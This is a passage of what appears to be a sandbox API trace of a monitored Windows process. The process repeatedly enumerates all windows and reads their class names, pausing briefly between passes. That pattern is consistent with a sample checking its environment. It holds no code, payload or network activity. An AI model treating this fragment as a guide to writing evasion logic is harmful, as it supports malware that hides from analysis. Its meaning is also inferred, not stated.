nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.631] GetClassNameA (in: hWnd=0x400c0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.631] GetClassNameA (in: hWnd=0x10146, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ATL:000007FEF5D052C0") returned 20 [0071.631] GetClassNameA (in: hWnd=0x20118, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.631] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.631] GetClassNameA (in: hWnd=0x20028, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.631] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.631] GetClassNameA (in: hWnd=0x1007a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.631] GetClassNameA (in: hWnd=0x10066, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.631] GetClassNameA (in: hWnd=0x10090, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x10084, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x10082, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Button") returned 6 [0071.632] GetClassNameA (in: hWnd=0x10056, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0071.632] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x500a2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x10092, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0071.632] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0071.632] GetClassNameA (in: hWnd=0x800a8, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0071.632] GetClassNameA (in: hWnd=0x300c6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x400d0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0071.632] GetClassNameA (in: hWnd=0x400f0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0071.632] GetClassNameA (in: hWnd=0x300de, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x300ca, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x400c4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.632] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0071.632] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0071.632] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0071.632] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0071.632] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0071.632] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="dallasRwnd") returned 10 [0071.633] GetClassNameA (in: hWnd=0x10196, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="wooden") returned 6 [0071.633] GetClassNameA (in: hWnd=0x10192, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="SpiceDespitecls") returned 15 [0071.633] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="smithwin") returned 8 [0071.633] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="zoo_differ_cls") returned 14 [0071.633] GetClassNameA (in: hWnd=0x10186, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ruby_") returned 5 [0071.633] GetClassNameA (in: hWnd=0x10182, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="birthbeanclass") returned 14 [0071.633] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="objectsvirusIsraeli") returned 19 [0071.633] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="seekerapp") returned 9 [0071.633] GetClassNameA (in: hWnd=0x10176, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="potentiallywin") returned 14 [0071.633] GetClassNameA (in: hWnd=0x10172, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Wheneverwnd") returned 11 [0071.633] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="knewDifferenceskarenwnd") returned 23 [0071.633] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Definitelycls") returned 13 [0071.633] GetClassNameA (in: hWnd=0x10166, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="receptor_paintings_cls") returned 22 [0071.633] GetClassNameA (in: hWnd=0x10162, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="beveragesTapesdodclass") returned 22 [0071.633] GetClassNameA (in: hWnd=0x60110, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="abortion_Serbia_effect_") returned 23 [0071.633] GetClassNameA (in: hWnd=0x3015a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0071.633] GetClassNameA (in: hWnd=0x10150, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0071.633] GetClassNameA (in: hWnd=0x1014e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0071.633] GetClassNameA (in: hWnd=0x20144, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0071.633] GetClassNameA (in: hWnd=0x10138, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0071.633] GetClassNameA (in: hWnd=0x10130, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ATL:000007FEFB4241F0") returned 20 [0071.633] GetClassNameA (in: hWnd=0x10126, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0071.633] GetClassNameA (in: hWnd=0x200d6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.634] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0071.634] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.634] GetClassNameA (in: hWnd=0x10108, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.634] GetClassNameA (in: hWnd=0x10102, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.634] GetClassNameA (in: hWnd=0x50094, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0071.634] GetClassNameA (in: hWnd=0x1008a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.634] GetClassNameA (in: hWnd=0x10088, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.634] GetClassNameA (in: hWnd=0x10080, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.634] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.634] GetClassNameA (in: hWnd=0x20020, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="#43") returned 3 [0071.634] GetClassNameA (in: hWnd=0x1006a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0071.634] GetClassNameA (in: hWnd=0x10058, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0071.634] GetClassNameA (in: hWnd=0x10052, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0071.634] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0071.634] GetClassNameA (in: hWnd=0x20046, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0071.634] GetClassNameA (in: hWnd=0x30044, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0071.634] GetClassNameA (in: hWnd=0x20018, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0071.634] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0071.634] GetClassNameA (in: hWnd=0x30140, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.634] GetClassNameA (in: hWnd=0x1005c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0071.634] GetClassNameA (in: hWnd=0x10054, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.634] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.634] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10198, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10194, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10190, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10188, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10184, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10180, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10178, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10174, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10170, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10168, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10164, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10160, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x1013a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10132, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x10128, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x700a4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.635] GetClassNameA (in: hWnd=0x20104, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0071.636] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.636] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.636] GetClassNameA (in: hWnd=0x10048, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.636] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.636] Sleep (dwMilliseconds=0x64) [0071.738] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) returned 1 [0071.738] GetClassNameA (in: hWnd=0x3013e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0071.738] GetClassNameA (in: hWnd=0x300b2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x300ee, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x400c0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x10146, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ATL:000007FEF5D052C0") returned 20 [0071.738] GetClassNameA (in: hWnd=0x20118, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.738] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.738] GetClassNameA (in: hWnd=0x20028, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0071.738] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x1007a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x10066, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x10090, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x10084, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x10082, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Button") returned 6 [0071.738] GetClassNameA (in: hWnd=0x10056, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0071.738] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x500a2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.738] GetClassNameA (in: hWnd=0x10092, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0071.739] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0071.739] GetClassNameA (in: hWnd=0x800a8, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0071.739] GetClassNameA (in: hWnd=0x300c6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.739] GetClassNameA (in: hWnd=0x400d0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0071.739] GetClassNameA (in: hWnd=0x400f0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0071.739] GetClassNameA (in: hWnd=0x300de, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.739] GetClassNameA (in: hWnd=0x300ca, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.739] GetClassNameA (in: hWnd=0x400c4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.739] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0071.739] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0071.739] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0071.739] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0071.739] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0071.739] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="dallasRwnd") returned 10 [0071.739] GetClassNameA (in: hWnd=0x10196, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="wooden") returned 6 [0071.739] GetClassNameA (in: hWnd=0x10192, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="SpiceDespitecls") returned 15 [0071.739] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="smithwin") returned 8 [0071.739] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="zoo_differ_cls") returned 14 [0071.739] GetClassNameA (in: hWnd=0x10186, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ruby_") returned 5 [0071.739] GetClassNameA (in: hWnd=0x10182, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="birthbeanclass") returned 14 [0071.739] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="objectsvirusIsraeli") returned 19 [0071.739] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="seekerapp") returned 9 [0071.740] GetClassNameA (in: hWnd=0x10176, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="potentiallywin") returned 14 [0071.740] GetClassNameA (in: hWnd=0x10172, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Wheneverwnd") returned 11 [0071.740] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="knewDifferenceskarenwnd") returned 23 [0071.740] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Definitelycls") returned 13 [0071.740] GetClassNameA (in: hWnd=0x10166, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="receptor_paintings_cls") returned 22 [0071.740] GetClassNameA (in: hWnd=0x10162, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="beveragesTapesdodclass") returned 22 [0071.740] GetClassNameA (in: hWnd=0x60110, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="abortion_Serbia_effect_") returned 23 [0071.740] GetClassNameA (in: hWnd=0x3015a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0071.740] GetClassNameA (in: hWnd=0x10150, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0071.740] GetClassNameA (in: hWnd=0x1014e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0071.740] GetClassNameA (in: hWnd=0x20144, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0071.740] GetClassNameA (in: hWnd=0x10138, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0071.740] GetClassNameA (in: hWnd=0x10130, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="ATL:000007FEFB4241F0") returned 20 [0071.740] GetClassNameA (in: hWnd=0x10126, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0071.740] GetClassNameA (in: hWnd=0x200d6, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.740] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0071.740] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.740] GetClassNameA (in: hWnd=0x10108, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.741] GetClassNameA (in: hWnd=0x10102, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.741] GetClassNameA (in: hWnd=0x50094, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0071.741] GetClassNameA (in: hWnd=0x1008a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.741] GetClassNameA (in: hWnd=0x10088, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0071.741] GetClassNameA (in: hWnd=0x10080, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.741] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.741] GetClassNameA (in: hWnd=0x20020, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="#43") returned 3 [0071.741] GetClassNameA (in: hWnd=0x1006a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0071.741] GetClassNameA (in: hWnd=0x10058, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0071.741] GetClassNameA (in: hWnd=0x10052, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0071.741] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0071.741] GetClassNameA (in: hWnd=0x20046, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0071.741] GetClassNameA (in: hWnd=0x30044, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0071.741] GetClassNameA (in: hWnd=0x20018, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0071.741] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0071.741] GetClassNameA (in: hWnd=0x30140, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.741] GetClassNameA (in: hWnd=0x1005c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0071.741] GetClassNameA (in: hWnd=0x10054, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.741] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10198, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10194, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10190, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10188, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10184, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10180, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10178, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10174, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10170, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10168, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.742] GetClassNameA (in: hWnd=0x10164, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x10160, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x1013a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x10132, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x10128, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x700a4, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x20104, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0071.743] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0071.743] GetClassNameA (in: hWnd=0x10048, 